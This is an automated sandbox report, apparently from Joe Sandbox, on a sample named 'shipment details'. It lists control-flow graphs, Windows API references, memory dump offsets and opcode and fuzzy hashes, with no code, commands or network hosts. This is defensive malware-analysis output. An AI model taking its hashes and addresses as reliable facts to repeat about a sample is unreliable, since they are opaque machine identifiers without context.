                                                                                • Instruction Fuzzy Hash: 555186B0A003498FDB04DFA9D688BEEBFF1EF49300F248499E118A7260D7749944CF66

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 548 cfcac0-cfcb4f GetCurrentProcess 552 cfcb58-cfcb8c GetCurrentThread 548->552 553 cfcb51-cfcb57 548->553 554 cfcb8e-cfcb94 552->554 555 cfcb95-cfcbc9 GetCurrentProcess 552->555 553->552 554->555 556 cfcbcb-cfcbd1 555->556 557 cfcbd2-cfcbed call cfcc8f 555->557 556->557 561 cfcbf3-cfcc22 GetCurrentThreadId 557->561 562 cfcc2b-cfcc8d 561->562 563 cfcc24-cfcc2a 561->563 563->562
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00CFCB3E
                                                                                • GetCurrentThread.KERNEL32 ref: 00CFCB7B
                                                                                • GetCurrentProcess.KERNEL32 ref: 00CFCBB8
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00CFCC11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 27052f382e541d582069bace5e2666a4124cc6578cee77640481c680d454941d
                                                                                • Instruction ID: 4266cf26aafd7cab13ae65d31d2ea74f601e9a0bc2f79d720c227b4b3cde9b91
                                                                                • Opcode Fuzzy Hash: 27052f382e541d582069bace5e2666a4124cc6578cee77640481c680d454941d
                                                                                • Instruction Fuzzy Hash: 8F5177B0A003498FDB44DFAAD688BAEBBF5EF49304F208459E119A7360D7749944CF66

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 706 cfa428-cfa437 707 cfa439-cfa446 call cf97a4 706->707 708 cfa463-cfa467 706->708 714 cfa45c 707->714 715 cfa448 707->715 710 cfa47b-cfa4bc 708->710 711 cfa469-cfa473 708->711 717 cfa4be-cfa4c6 710->717 718 cfa4c9-cfa4d7 710->718 711->710 714->708 763 cfa44e call cfa6c0 715->763 764 cfa44e call cfa6b0 715->764 717->718 719 cfa4fb-cfa4fd 718->719 720 cfa4d9-cfa4de 718->720 725 cfa500-cfa507 719->725 722 cfa4e9 720->722 723 cfa4e0-cfa4e7 call cf97b0 720->723 721 cfa454-cfa456 721->714 724 cfa598-cfa658 721->724 727 cfa4eb-cfa4f9 722->727 723->727 756 cfa65a-cfa65d 724->756 757 cfa660-cfa68b GetModuleHandleW 724->757 728 cfa509-cfa511 725->728 729 cfa514-cfa51b 725->729 727->725 728->729 732 cfa51d-cfa525 729->732 733 cfa528-cfa531 call cf97c0 729->733 732->733 737 cfa53e-cfa543 733->737 738 cfa533-cfa53b 733->738 739 cfa545-cfa54c 737->739 740 cfa561-cfa565 737->740 738->737 739->740 742 cfa54e-cfa55e call cf97d0 call cf97e0 739->742 761 cfa568 call cfadb1 740->761 762 cfa568 call cfadc0 740->762 742->740 745 cfa56b-cfa56e 747 cfa591-cfa597 745->747 748 cfa570-cfa58e 745->748 748->747 756->757 758 cfa68d-cfa693 757->758 759 cfa694-cfa6a8 757->759 758->759 761->745 762->745 763->721 764->721
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CFA67E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 469605787eafd699950a0e3b3e48e5693a65994ea2c82c8895dbd1a13db4fc1a
                                                                                • Instruction ID: 63d367f27bb3c4ffc0187cb85a6124caff25c3ccbcbc127aade0741abda200cb
                                                                                • Opcode Fuzzy Hash: 469605787eafd699950a0e3b3e48e5693a65994ea2c82c8895dbd1a13db4fc1a
                                                                                • Instruction Fuzzy Hash: 847146B0A00B098FDB64DF29D04576ABBF5FF88300F00892ED59AD7A50D774E949CB92

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 765 5e06182-5e06188 766 5e06134-5e06135 765->766 767 5e0618a-5e0619c 765->767 769 5e06137-5e0613b GetSystemMetrics 766->769 770 5e0613c-5e0614f 766->770 771 5e061a2-5e061a9 767->771 772 5e062fe-5e06306 767->772 769->770 773 5e06151-5e06157 770->773 774 5e06158-5e0617e 770->774 776 5e062a3-5e062c3 call 5e06038 771->776 777 5e061af-5e06217 call 5e047b4 771->777 773->774 786 5e062ce-5e062f7 776->786 794 5e0621c-5e06229 777->794 786->772 796 5e06260-5e062a1 794->796 797 5e0622b-5e0625e 794->797 796->786 797->786
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(00000050), ref: 05E0613B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-0
                                                                                • Opcode ID: 838df53bcb1ca297bf80d430b487604fdc0950fd31304bd0dbfbed02f4af500e
                                                                                • Instruction ID: 4a236e88a803c1d09045716a9de43d54d8c085ba8577dc290dffbd0cd70f62bb
                                                                                • Opcode Fuzzy Hash: 838df53bcb1ca297bf80d430b487604fdc0950fd31304bd0dbfbed02f4af500e
                                                                                • Instruction Fuzzy Hash: 39411F366002008FCB04EF68D545B6AB7F6FF84310F449468E58ADB3A5CB30EC59CB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 807 cfcd00-cfcd9c DuplicateHandle 808 cfcd9e-cfcda4 807->808 809 cfcda5-cfcdc2 807->809 808->809
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CFCD8F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: cb4fed948e687d82a8b3f304c4f50c2e998b48d57f3507e47a767c8bae0459d2
                                                                                • Instruction ID: d90e0f4fbc5af4317e715e35ab4efc45c437ec4ffa4e8c5cdc897e2b6c08ea2f
                                                                                • Opcode Fuzzy Hash: cb4fed948e687d82a8b3f304c4f50c2e998b48d57f3507e47a767c8bae0459d2
                                                                                • Instruction Fuzzy Hash: D921E3B5D002089FDB10CFA9D584AEEBFF9EF48310F14841AE918A3350D379AA44CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 812 cfcd08-cfcd9c DuplicateHandle 813 cfcd9e-cfcda4 812->813 814 cfcda5-cfcdc2 812->814 813->814
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CFCD8F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 510deadf1788e7aa9bba99706442392cfef2d61a0f7cc0bee504aa956d7ef1fd
                                                                                • Instruction ID: 6a4a926c2e6451709639b735839cd704c3c4cc1bbe33bb1d48e42b84f9676961
                                                                                • Opcode Fuzzy Hash: 510deadf1788e7aa9bba99706442392cfef2d61a0f7cc0bee504aa956d7ef1fd
                                                                                • Instruction Fuzzy Hash: 3121C4B5D002489FDB10CF9AD584AEEBFF9FB48310F14841AE918A3350D379A944CFA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 817 5e06f70-5e091fd PeekMessageW 819 5e09206-5e09227 817->819 820 5e091ff-5e09205 817->820 820->819
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,05E08DA2,00000000,00000000,03AD41A0,02B1BE98), ref: 05E091F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePeek
                                                                                • String ID:
                                                                                • API String ID: 2222842502-0
                                                                                • Opcode ID: b890f10f5cdf18b90aa37f71a489e115426a60915d9cab7cac75118b4fec5bb5
                                                                                • Instruction ID: 124d7e2b4aa8be37032923838092bb500c79f7ab952615e340861d39b1abf1db
                                                                                • Opcode Fuzzy Hash: b890f10f5cdf18b90aa37f71a489e115426a60915d9cab7cac75118b4fec5bb5
                                                                                • Instruction Fuzzy Hash: F71117B18003499FDB10CF9AD544BDEBBF8FB48310F108469E558A3241C378A944CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 822 5e09180-5e091fd PeekMessageW 823 5e09206-5e09227 822->823 824 5e091ff-5e09205 822->824 824->823
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,05E08DA2,00000000,00000000,03AD41A0,02B1BE98), ref: 05E091F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePeek
                                                                                • String ID:
                                                                                • API String ID: 2222842502-0
                                                                                • Opcode ID: 301f43911457e60ef95514a61539151ff4b989bf3885bab26e4ab4221a2c4548
                                                                                • Instruction ID: 0a6705f01998178fa5c298cf25cb6744f4d2178b9e39fe9c4ca766e198486c92
                                                                                • Opcode Fuzzy Hash: 301f43911457e60ef95514a61539151ff4b989bf3885bab26e4ab4221a2c4548
                                                                                • Instruction Fuzzy Hash: 5A1107B5D00249DFDB10CF9AD544BEEBBF9FB48314F10842AE558A3251C378A944CFA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 826 cfa618-cfa658 827 cfa65a-cfa65d 826->827 828 cfa660-cfa68b GetModuleHandleW 826->828 827->828 829 cfa68d-cfa693 828->829 830 cfa694-cfa6a8 828->830 829->830
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CFA67E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: f0ac18bbdd65732e56fdc22ff31dd41698435db3580c3e767933238629bd157c
                                                                                • Instruction ID: e4c55872a860c7e78e574add7f2f4d49d7e81133394e96df8fa538645dbbbf62
                                                                                • Opcode Fuzzy Hash: f0ac18bbdd65732e56fdc22ff31dd41698435db3580c3e767933238629bd157c
                                                                                • Instruction Fuzzy Hash: 651110B5C003498FCB14CF9AC444ADEFBF9EF88314F14842AD528A7210C379A645CFA6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 832 5e087ec-5e09992 DispatchMessageW 834 5e09994-5e0999a 832->834 835 5e0999b-5e099af 832->835 834->835
                                                                                APIs
                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E08EE7), ref: 05E09985
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: DispatchMessage
                                                                                • String ID:
                                                                                • API String ID: 2061451462-0
                                                                                • Opcode ID: 2e49397d35f3bf8171d1c8ec2eb7c208a4d4da318c09a479864af134dc450a9c
                                                                                • Instruction ID: ef406d3a81719ea1a8634cf36689ca98f048b689ea7b73c732ce7793dc59d1e2
                                                                                • Opcode Fuzzy Hash: 2e49397d35f3bf8171d1c8ec2eb7c208a4d4da318c09a479864af134dc450a9c
                                                                                • Instruction Fuzzy Hash: D3112EB0C047488FCB20DF9AD448BDEFBF8EB48314F10846AE458A3241D379A544CFA5
                                                                                APIs
                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E08EE7), ref: 05E09985
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: DispatchMessage
                                                                                • String ID:
                                                                                • API String ID: 2061451462-0
                                                                                • Opcode ID: 0549ae51762be9ba5ee12a008b5b9ea41e201574c40b7c13dd56567b88f22192
                                                                                • Instruction ID: 2b6e46ebb06008d709f02adcabec05039525ac695ca8203e2ccbe2701cba41f3
                                                                                • Opcode Fuzzy Hash: 0549ae51762be9ba5ee12a008b5b9ea41e201574c40b7c13dd56567b88f22192
                                                                                • Instruction Fuzzy Hash: 151122B5C002488FCB20DF9AD444BDEFBF4EB48314F10845AE458A3241C379A544CFA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: ad2a9ae699f44f90a4b45ca1e37f9c326babf82466043d0e646f5bdc079f1c2d
                                                                                • Instruction ID: 6ffa780d10353bb3b538e3789f38e3dc005809a32fff72d45063630cffe63687
                                                                                • Opcode Fuzzy Hash: ad2a9ae699f44f90a4b45ca1e37f9c326babf82466043d0e646f5bdc079f1c2d
                                                                                • Instruction Fuzzy Hash: E81112B5C003488FCB20DF9AD949B9EBBF8EB48324F20845AD558A7340C379A584CFA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: cb46ef9b18adde18b490a05f13cf21ce37498d26e9d80d79ea9458560c675fd5
                                                                                • Instruction ID: 174db7006409c2fc914da8fd417f6ee8a6479dd7123c9134528fa35819100262
                                                                                • Opcode Fuzzy Hash: cb46ef9b18adde18b490a05f13cf21ce37498d26e9d80d79ea9458560c675fd5
                                                                                • Instruction Fuzzy Hash: 181112B1C003488FCB20DF9AD548B9EBBF8EB48324F208459D558A7240C379A584CFA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dd9c7a77876f7c6a912d1971a51db7e5164d5c732371d4681f819a7aac559bc3
                                                                                • Instruction ID: e4560d9b8d7a6772098eb5752df8b6097ee4671fae2fcf6e602522a353b5e87b
                                                                                • Opcode Fuzzy Hash: dd9c7a77876f7c6a912d1971a51db7e5164d5c732371d4681f819a7aac559bc3
                                                                                • Instruction Fuzzy Hash: 4621F271604205DFCB14DF24D9C4B26BF65FB89318F20C569E94B4B696C33AD807CA62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 15334f840bd0a53cda8a80f4b21494b7f2fbba8fcc99d6d577249edf08ebdf72
                                                                                • Instruction ID: ed6882f2b91142fc57e0eb19857dfb1b17f3f206113e08b1ebbc01552bed3c0d
                                                                                • Opcode Fuzzy Hash: 15334f840bd0a53cda8a80f4b21494b7f2fbba8fcc99d6d577249edf08ebdf72
                                                                                • Instruction Fuzzy Hash: 30213871504205DFDF00DF14D9C4B2ABF75FB95328F24C569E94B0B651C33AD846CAA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fcedfef530252ad162394041ac3712d858f290e697791c263d186655efb4ff60
                                                                                • Instruction ID: d0cc208c91d0600a129be518fa982881806770f294ca815bb6d2a14f86c67351
                                                                                • Opcode Fuzzy Hash: fcedfef530252ad162394041ac3712d858f290e697791c263d186655efb4ff60
                                                                                • Instruction Fuzzy Hash: 532165755093C08FDB12CF24D594715BF71EB46314F28C5DAD84A8F6A7C33A990ACB62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4518806558.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cad000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                                • Instruction ID: 886625023ecdfe8bba39b85a373e3b164c579c095de2ba5eb7b35c4f4ebebdf1
                                                                                • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                                • Instruction Fuzzy Hash: 8E11B275505280CFDB12CF14D5C4B1AFF71FB85328F24C6A9D84A4BA56C33AD94ACBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 22f2d67fbbb1a1f7a772992ca6a939cfe2359fdbbbedc684c7a5f687a77227fb
                                                                                • Instruction ID: 799cb12646e16413673957238b5b4bb984cf76252c6622744e4d7ceeb0be00ea
                                                                                • Opcode Fuzzy Hash: 22f2d67fbbb1a1f7a772992ca6a939cfe2359fdbbbedc684c7a5f687a77227fb
                                                                                • Instruction Fuzzy Hash: 2B12C6B0C89745CAE390CF25E94C2A93BB1FB81318FD64A09C9651F2E4DBB4156ECF44
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9ca30622a452d96236c65c3c06d806df2996f26183c121effe68ccc91c169c8f
                                                                                • Instruction ID: 6ff521e0110ef8d9394767b07c767c6cb42deb38b077c2da61d3ea32be3acc3a
                                                                                • Opcode Fuzzy Hash: 9ca30622a452d96236c65c3c06d806df2996f26183c121effe68ccc91c169c8f
                                                                                • Instruction Fuzzy Hash: 35A17C32E0021D8FCF45DFB5D8845AEB7B2FF84300B15856AFA15AB265DB31E915CB41

                                                                                Execution Graph

                                                                                Execution Coverage:17%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:19%
                                                                                Total number of Nodes:42
                                                                                Total number of Limit Nodes:6
                                                                                execution_graph 18848 133e018 18849 133e024 18848->18849 18856 6bd2968 18849->18856 18862 6bd295a 18849->18862 18850 133e0c3 18869 6bdfc5f 18850->18869 18873 6bdfc68 18850->18873 18851 133e61f 18857 6bd298a 18856->18857 18858 6bd2a56 18857->18858 18877 6bd992c 18857->18877 18883 6bd9328 18857->18883 18887 6bd9548 18857->18887 18858->18850 18863 6bd2928 18862->18863 18864 6bd2962 18862->18864 18865 6bd2a56 18864->18865 18866 6bd992c 2 API calls 18864->18866 18867 6bd9548 2 API calls 18864->18867 18868 6bd9328 LdrInitializeThunk 18864->18868 18865->18850 18866->18865 18867->18865 18868->18865 18870 6bdfc68 18869->18870 18871 6bd9548 2 API calls 18870->18871 18872 6bdfd3a 18870->18872 18871->18872 18872->18851 18874 6bdfc8a 18873->18874 18875 6bd9548 2 API calls 18874->18875 18876 6bdfd3a 18874->18876 18875->18876 18876->18851 18879 6bd97e3 18877->18879 18878 6bd9924 LdrInitializeThunk 18881 6bd9a81 18878->18881 18879->18878 18882 6bd9328 LdrInitializeThunk 18879->18882 18881->18858 18882->18879 18884 6bd933a 18883->18884 18885 6bd933f 18883->18885 18884->18858 18885->18884 18886 6bd9a69 LdrInitializeThunk 18885->18886 18886->18884 18889 6bd9579 18887->18889 18888 6bd96d9 18888->18858 18889->18888 18890 6bd9924 LdrInitializeThunk 18889->18890 18892 6bd9328 LdrInitializeThunk 18889->18892 18890->18888 18892->18889 18893 6bd9c70 18894 6bd9c9d 18893->18894 18895 6bd9328 LdrInitializeThunk 18894->18895 18896 6bdbb7f 18894->18896 18898 6bd9fa6 18894->18898 18895->18898 18897 6bd9328 LdrInitializeThunk 18897->18898 18898->18896 18898->18897

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 256 13329ec-13329f6 258 1332981-133298a 256->258 259 13329f8-1332a01 256->259 260 1332990-1332999 258->260 259->260 261 1332a03-1332a3b 259->261 266 13329a0-13329c8 260->266 264 1332a5d-1332aac 261->264 265 1332a3d-1332a5c 261->265 271 1332ac7-1332acf 264->271 272 1332aae-1332ab5 264->272 275 1332ad2-1332ae6 271->275 273 1332ab7-1332abc 272->273 274 1332abe-1332ac5 272->274 273->275 274->275 278 1332ae8-1332aef 275->278 279 1332afc-1332b04 275->279 280 1332af1-1332af3 278->280 281 1332af5-1332afa 278->281 282 1332b06-1332b0a 279->282 280->282 281->282 284 1332b6a-1332b6d 282->284 285 1332b0c-1332b21 282->285 286 1332bb5-1332bbb 284->286 287 1332b6f-1332b84 284->287 285->284 293 1332b23-1332b26 285->293 288 1332bc1-1332bc3 286->288 289 13336b6 286->289 287->286 297 1332b86-1332b8a 287->297 288->289 291 1332bc9-1332bce 288->291 294 13336bb-1333700 289->294 295 1333664-1333668 291->295 296 1332bd4 291->296 298 1332b45-1332b63 call 13302c8 293->298 299 1332b28-1332b2a 293->299 316 1333702-1333728 294->316 317 133372e-1333874 294->317 301 133366a-133366d 295->301 302 133366f-13336b5 295->302 296->295 303 1332b92-1332bb0 call 13302c8 297->303 304 1332b8c-1332b90 297->304 298->284 299->298 305 1332b2c-1332b2f 299->305 301->294 301->302 303->286 304->286 304->303 305->284 309 1332b31-1332b43 305->309 309->284 309->298 316->317 319 13338a6-13338a9 317->319 320 1333876-1333878 317->320 322 13338aa-13338bc 319->322 320->322 323 133387a-13338a3 320->323 325 13338ee-13338f4 322->325 326 13338be-13338eb 322->326 323->319 328 13338f6-1333908 325->328 329 1333928-1333937 325->329 326->325 331 133393a-133393d 328->331 332 133390a-133390c 328->332 329->331 333 133393e-1333941 331->333 332->333 334 133390e-1333910 332->334 335 1333942-13339e8 333->335 334->335 336 1333912-1333927 334->336 336->329
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                • API String ID: 0-4015495023
                                                                                • Opcode ID: 56bd674910cfbd0b892d815325aa43b2d99fa2d2606f000186c3fb73817ede6e
                                                                                • Instruction ID: 5b664e6b2d48b0e5db82cc9bde8d85ff9432a4abb818522a9169094afa038b4a
                                                                                • Opcode Fuzzy Hash: 56bd674910cfbd0b892d815325aa43b2d99fa2d2606f000186c3fb73817ede6e
                                                                                • Instruction Fuzzy Hash: 3202AF319147A48FCBA2CF38C5D0757BBB1FF4A318B5488EDC4429B926D775A801DB86

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 337 1337118-133713b 338 1337146-1337166 337->338 339 133713d-1337143 337->339 342 1337168 338->342 343 133716d-1337174 338->343 339->338 344 13374fc-1337505 342->344 345 1337176-1337181 343->345 346 1337187-133719a 345->346 347 133750d-1337519 345->347 350 13371b0-13371cb 346->350 351 133719c-13371aa 346->351 352 133751b-1337521 347->352 353 133754e 347->353 360 13371ef-13371f2 350->360 361 13371cd-13371d3 350->361 351->350 358 1337484-133748b 351->358 354 1337523-1337536 352->354 355 1337556-133755d 352->355 354->353 358->344 364 133748d-133748f 358->364 365 13371f8-13371fb 360->365 366 133734c-1337352 360->366 362 13371d5 361->362 363 13371dc-13371df 361->363 362->363 362->366 368 1337212-1337218 362->368 369 133743e-1337441 362->369 363->368 370 13371e1-13371e4 363->370 371 1337491-1337496 364->371 372 133749e-13374a4 364->372 365->366 367 1337201-1337207 365->367 366->369 373 1337358-133735d 366->373 367->366 374 133720d 367->374 375 133721a-133721c 368->375 376 133721e-1337220 368->376 377 1337447-133744d 369->377 378 1337508 369->378 379 13371ea 370->379 380 133727e-1337284 370->380 371->372 372->347 381 13374a6-13374ab 372->381 373->369 374->369 385 133722a-1337233 375->385 376->385 386 1337472-1337476 377->386 387 133744f-1337457 377->387 378->347 379->369 380->369 384 133728a-1337290 380->384 382 13374f0-13374f3 381->382 383 13374ad-13374b2 381->383 382->378 395 13374f5-13374fa 382->395 383->378 388 13374b4 383->388 389 1337292-1337294 384->389 390 1337296-1337298 384->390 392 1337246-133726e 385->392 393 1337235-1337240 385->393 386->358 394 1337478-133747e 386->394 387->347 391 133745d-133746c 387->391 396 13374bb-13374c0 388->396 397 13372a2-13372b9 389->397 390->397 391->350 391->386 415 1337362-1337398 392->415 416 1337274-1337279 392->416 393->369 393->392 394->345 394->358 395->344 395->364 398 13374e2-13374e4 396->398 399 13374c2-13374c4 396->399 408 13372e4-133730b 397->408 409 13372bb-13372d4 397->409 398->378 406 13374e6-13374e9 398->406 403 13374d3-13374d9 399->403 404 13374c6-13374cb 399->404 403->347 407 13374db-13374e0 403->407 404->403 406->382 407->398 411 13374b6-13374b9 407->411 408->378 420 1337311-1337314 408->420 409->415 421 13372da-13372df 409->421 411->378 411->396 422 13373a5-13373ad 415->422 423 133739a-133739e 415->423 416->415 420->378 424 133731a-1337343 420->424 421->415 422->378 427 13373b3-13373b8 422->427 425 13373a0-13373a3 423->425 426 13373bd-13373c1 423->426 424->415 439 1337345-133734a 424->439 425->422 425->426 428 13373c3-13373c9 426->428 429 13373e0-13373e4 426->429 427->369 428->429 431 13373cb-13373d3 428->431 432 13373e6-13373ec 429->432 433 13373ee-133740d call 13376f1 429->433 431->378 434 13373d9-13373de 431->434 432->433 436 1337413-1337417 432->436 433->436 434->369 436->369 437 1337419-1337435 436->437 437->369 439->415
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$(o]q$,aq$,aq
                                                                                • API String ID: 0-1947289240
